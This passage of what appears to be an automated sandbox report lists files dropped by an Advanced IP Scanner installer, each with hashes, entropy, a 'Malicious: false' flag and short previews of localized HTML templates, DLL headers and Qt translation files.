Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>.....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..............:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.......:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>......:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>......:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellsp

C:\Program Files (x86)\Advanced IP Scanner\details_panel_tr_tr.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.8635515480686085
Encrypted:	false
SSDEEP:	24:lFozSsuSxXqXH0k9/Ue/0Kt5RGD4ReEhyv:HESsRxXqXHBUM0U2DSs
MD5:	E63975AFFC0CFD1416D93982E6E0C0E8
SHA1:	28F0F8996D128E8095BE958B32F245F1EBB90D60
SHA-256:	6B385410B01F24D20294E1B92E7D391F20D146A0AAB937809483C8ED624017CA
SHA-512:	2DE0EA4CF7C1B0FBB3375A2E46677E48C7CE967954ED19B9B43DCACA462960A55969E6EB7FA51E12656F812C6768CA1E135007111BD4AAA31055847F229656D5
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Durum:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>..letim sistemi:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.retici:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Kullan.c.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>T.r:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Tarih:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Yorumlar:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Hizmet</center></b></td><td><b><center>Ayr.nt.lar</

C:\Program Files (x86)\Advanced IP Scanner\details_panel_uk_ua.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.138597371923522
Encrypted:	false
SSDEEP:	24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
MD5:	280FFC27B6422BD266F49BE7798DB4D9
SHA1:	203F0E4D50B553133531D25727397417BBABAA7B
SHA-256:	5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
SHA-512:	B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\details_panel_vi_vn.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1184
Entropy (8bit):	5.02025670297611
Encrypted:	false
SSDEEP:	24:lFo6jdsuSxFhXqNHidEy0Kt5RGDFE0GReEhyv:HZdsRDhXqNHidZ0U2DFE0ks
MD5:	5B2A97F16B2382930301E6C2C8BFF7A7
SHA1:	C66302E72DD2C5561D6187FA4276D78063915693
SHA-256:	EDB89B8D25039530B47B0893A14CA803CE2DAF9A2358489ED3C335595B1B79DF
SHA-512:	48C67FE96D43FE255156AA3DC94BFC8A6D57B39FC91B1CEF2B498CAC6914DBABB76CF32F193EF897182C6EACA3334D374B12AD53BC2242628E930A7B73C65BFC
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Tr.ng th.i:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>H. .i.u h.nh:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Nh. s.n xu.t:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Ng..i d.ng:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Ki.u:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Ng.y:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Nh.n x.t:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>D.ch v.</center></b></t

C:\Program Files (x86)\Advanced IP Scanner\details_panel_zh_cn.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1142
Entropy (8bit):	5.0337822285325755
Encrypted:	false
SSDEEP:	24:lFoSssuSVIXqFHGqP97iV0Kt5RGDqReEhyv:HXssRVIXqFHGqP900U2Dws
MD5:	34B8B376FC335077A97D5C218E01E14D
SHA1:	45D32290176CF33D77EA0FE8F40D0BC3D6D6F2C8
SHA-256:	3733D0B7A0B799AD19140DCB4D22C8B024E102D7C2D44AF1D6CCCAAB9920CF12
SHA-512:	7A65D54FB9EE70B953A83E960337C6E4352207D82F99F041E29A57E9BEB8C80891295A39F038F8E463362506BDA375046891D1ECFEC075CD6FD5603933382FB3
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>..</center></b></

C:\Program Files (x86)\Advanced IP Scanner\details_panel_zh_tw.tpl (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1151
Entropy (8bit):	5.068076577523285
Encrypted:	false
SSDEEP:	24:lFokcsuSRVXqhayHmP9a0Kt5RGDD4ReEhyv:HpcsRPXqhayHmP9a0U2DDSs
MD5:	1E41F2F1C303F750C96681515894C7B4
SHA1:	A6B4E2EC874030D50A0156E4A6CF2EF952F11455
SHA-256:	350321BFDAD2FD43E09E94DC59F47888B21BECA6EDAE3D23A7C90B7E246611C0
SHA-512:	ACA0D361A7EE82263804FC9C210FD829EFD6FD633F3053A9D7DE801C620FC4B981337721B6FEDA6D05F0E80289BC874B7B0AAE9B1E74C0320C14F00DA258B7FD
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>..:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>....:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>..:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>..:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>..</center></b></td><td><b><center>....</cent

C:\Program Files (x86)\Advanced IP Scanner\is-075U6.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19136
Entropy (8bit):	7.011995208399749
Encrypted:	false
SSDEEP:	192:XY9fHQduPWVghW/EgbXH9YOCAs/nGfe4pBjSfbxaWNArXVWQ4mW0qnajMHxxBNTM:ef5W2hWcgbCA0GftpBjuYDlI663UD
MD5:	D6ABF5C056D80592F8E2439E195D61AC
SHA1:	33F793FD6A28673E766AD11EE1CF8EB8EF351BC0
SHA-256:	8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364
SHA-512:	6678F17F2274AABBA5279BA40A0159FF8A54241D811845A48D845172F4AA6F7397CFD07BF2368299A613DF1F3FF12E06C0E62C26683DFB08D82122609C3A3F62
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......T....@.............................^............ ...................<..............8............................................................................text...n........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-0FJR2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	5.137449444677303
Encrypted:	false
SSDEEP:	24:lFo/JhkCsuSH9ioXqIVoH39/m0Kt5RGDISReEhyv:HYZsRH9ZXqImHN/m0U2DIYs
MD5:	C09C9A49D20E9E03FBA82E0247B38770
SHA1:	B95253268F788CEB0B603E194C4AB1A7451B2C44
SHA-256:	717CDB05CB153C7C3389BA679B737EE4CABB7DF340AE74B6971CB231526EA3AD
SHA-512:	BAE15F62E99B43C1D7EF0AC4F5BEAFEA1629428668DE1237CDE1903E03B462EB687DE089DFB87B77CA97E8D02D72650EB274595F07DE6DD86FD459C634B97594
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>......:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>............ .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>.............:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>............:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>...........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\is-0N1O0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-0PGOL.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1246
Entropy (8bit):	5.138597371923522
Encrypted:	false
SSDEEP:	24:lFo/rhtCtunH/XqHH39/g/0Kt5RGDIygReEhyv:HuStyfXqHHN/g/0U2DIPs
MD5:	280FFC27B6422BD266F49BE7798DB4D9
SHA1:	203F0E4D50B553133531D25727397417BBABAA7B
SHA-256:	5DC9054AD67076F853743C7512BEC17071EF732A13B6BE5D0C18A39F7DBF32C6
SHA-512:	B446D3B2C1FA4F4D04AD62CAE6AC64023054B32669912B1586950B6C80751F99968AF7AA759EF05826D88BDB6670A1737717A1854872BF4214220BAEAC8C3311
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>....:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>.......... .......:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP-......:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC-......:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>........:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>..........:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>...:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>....:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>.........:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebe

C:\Program Files (x86)\Advanced IP Scanner\is-0TGAP.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.021897050678374
Encrypted:	false
SSDEEP:	384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
MD5:	687533A89B43510CCE4D8B2ECB261AA0
SHA1:	4004BA63880A92042C106FF6A549C6F5F69CE05D
SHA-256:	E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
SHA-512:	6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-133UG.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26816
Entropy (8bit):	6.632501498817798
Encrypted:	false
SSDEEP:	384:my+Kr6aLPmIHJI6/CpG3t2G3t4odXLhW2hWjgbCA0GftpBjpCjzTZlXBtFwLd:mZKrZPmIHJI6NT8irCXDyx
MD5:	809BC1010EAF714CD095189AF236CE2F
SHA1:	10DBC383F7C49DE17FC50E830E3CB494CC873DD1
SHA-256:	B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E
SHA-512:	F72EC10A0005E7023187EF6CCEDF2AF81D16174E628369FB834AF78E4EF2F3D44BF8B70E9B894ABC6791D7B9720C62C52A697FF0ADE0EDDDCAA52B6F14630D1D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.....$...................@...............................P............@.............................. ...........@...............,...<..............8............................................................................text....".......$.................. ..`.rsrc........@.......(..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\is-16ON1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	4.88658440484172
Encrypted:	false
SSDEEP:	24:lFosMmsuSNXq2HJi4c3Q0Kt5RGDxReEhyv:Hx1sRNXq2HJS3Q0U2D7s
MD5:	E133CA274E9A1C5B55A9AE459656E935
SHA1:	B115F78BD0BA440A10A2ED5093712D7675F3E45C
SHA-256:	D80655A9F288A1207F193025486A876F3B0BF30584F361FF04E8ECEBCB444DA0
SHA-512:	CD4B9AEECE96654B462CF2887C3A6809FA083772016D078172D19C64332D072FE3A1E1F46EF7B1017F3FDAF9F7B0BDC131682BCA50645909FA5BDB807D66B2FB
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Stav:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Opera.n. syst.m:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>V.robca:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Pou..vate.:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Typ:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>D.tum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Koment.re:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Slu.ba</center></b></td><td><b><center>Podrobnos

C:\Program Files (x86)\Advanced IP Scanner\is-18DNK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28545
Entropy (8bit):	4.714189994601161
Encrypted:	false
SSDEEP:	384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
MD5:	2AADC93C38DBB7E1D048B05B63133217
SHA1:	66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
SHA-256:	A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
SHA-512:	63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
Malicious:	false
Preview:	<.d....!..`...B..........[...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H...y......y......%..%V..0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.\|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-1MB1G.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28217
Entropy (8bit):	4.655652026218731
Encrypted:	false
SSDEEP:	768:NPgRUervlMMfgdhrAnEL326U24PonYBmC:N4RUetCHjHeQU
MD5:	C8AF2228F3F331635F1E4E55E1C9FD32
SHA1:	9AD8E149DDA58030C3D4104D653DCEC0AD534F9E
SHA-256:	16F95D32D808EA146F522FA230D65A635892CC54DF8014D40A9DD7774F234EDF
SHA-512:	DAD7F44C031D159500E39DC27E7F8B67165EA04EBBEEC71BECEF57CCEC66B85F0E26B6D319F3D4305CD42D95480CE03C0DAFBCA2B1C9EEE78A2FE3699606BDF0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..DV...O..\....[..X....^..0o...^..Td..(5......G....v..H,..QV..K...@...N:...h..V...E..._...^"......)N......Q....y..Q.......................Y....t..+....t..Rl...t..\k.....A....j......5t......@...C...H5..Z...f...0.......Fd...................~..3j...`..8....e..[.......\........N. =...G...y......y...Y..%..%...0..%E.+.....;.+.......+....n.+......+....&..G.... ..G....+a.H0...\A.Hw9.....Hw9.....I....(..J6....j.J6......J6......J6...JM.LD......L.b..\..M.S..B..R.......V....0..Wi...[..W.T.....Z.\|..SA.[f3..W..gc....D.w0K..H...H...%.......]....T...A..."..5r...~..7... d..F....T......2....G......Z.......as.9.E..A..L.#..d..M$o.....e.......l8...7E...^..J...I....^......C.......T.......Z...>...Y..>......3..0...l...L.......:..5.l..`..AV...(..y....X....0..T.......S.......ZW..tb..60......................US......>(......P..(....T..1V...)..R....2_.W.<..`..f.~.."T......4...1....;...^..6....5..............c..GF.;6...b..q.J..P...I....1..I

C:\Program Files (x86)\Advanced IP Scanner\is-1N62K.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27888
Entropy (8bit):	4.695402138614251
Encrypted:	false
SSDEEP:	384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
MD5:	B1DC69B7C86A8BEBB7B758BB8B241535
SHA1:	B75C4FC69FAC889067A836AB620285984476B7D9
SHA-256:	ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
SHA-512:	62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t......t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw..y......y......%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.\|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I

C:\Program Files (x86)\Advanced IP Scanner\is-1R2JH.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	1153
Entropy (8bit):	4.788912446448768
Encrypted:	false
SSDEEP:	24:lFouzisuSpI/XqOQ/HJla0Kt5RGDFTHReEhyv:HnesRpaXqOyHJla0U2DFJs
MD5:	FBA663967DF5DD4AB38D38DA1362598E
SHA1:	9557B768C03EB179FDEBB5F74724985F51685203
SHA-256:	466C8D1C6798F392281C81AF34638C334489AB56C7DB86A3A23B1EDB2918C2DA
SHA-512:	427505B6A8278CF009E4051D458BDABCBBE83B9D8B279FB7267777403E50BF26570D1FBD6EB4CD73E6F28E5565CEEA2B02B1EC3197FD85E78B5B0AB932FAC2D1
Malicious:	false
Preview:	<hr>..<h3 style="margin-left:2em">{name}</h3><p></p>..<table>...<tr><td><b>Status:</b></td><td style="padding-left:1em">{status}</td></tr>...<tr><td><b>Betriebssystem:</b></td><td style="padding-left:1em">{os}</td></tr>...<tr><td><b>IP:</b></td><td style="padding-left:1em">{ip}</td></tr>...<tr><td><b>MAC:</b></td><td style="padding-left:1em">{mac}</td></tr>...<tr><td><b>Hersteller:</b></td><td style="padding-left:1em">{manufacturer}</td></tr>...<tr><td><b>NetBIOS:</b></td><td style="padding-left:1em">{netbios}</td></tr>...<tr><td><b>Anwender:</b></td><td style="padding-left:1em">{user}</td></tr>...<tr><td><b>Art:</b></td><td style="padding-left:1em">{type}</td></tr>.. <tr><td><b>Datum:</b></td><td style="padding-left:1em">{date}</td></tr>...<tr><td><b>Kommentare:</b></td><td style="padding-left:1em">{comment}</td></tr>..</table>..<br>..<table border="1" cellpadding="4" cellspacing="0" bordercolor="#bebebe">...<tr><td><b><center>Dienst</center></b></td><td><b><center>Ausf.hrlich</ce

C:\Program Files (x86)\Advanced IP Scanner\is-253A4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1163
Entropy (8bit):	4.820312505780483
Encrypted:	false
SSDEEP:	24:lFoJgsuSAXqSH+l70Kt5RGDSRBIReEhyv:HogsRAXqSH+l70U2Di0s
MD5:	D085FB64BFB3757DB202DE6552075927
SHA1:	6D7D1701D2C4A9E4AF18217DD9169E19E1D03F3A
SHA-256:	411862A29DF284FA2D4B2E33FB9839DD030A99EBC5823212E9CDB2FFCFB3EE26
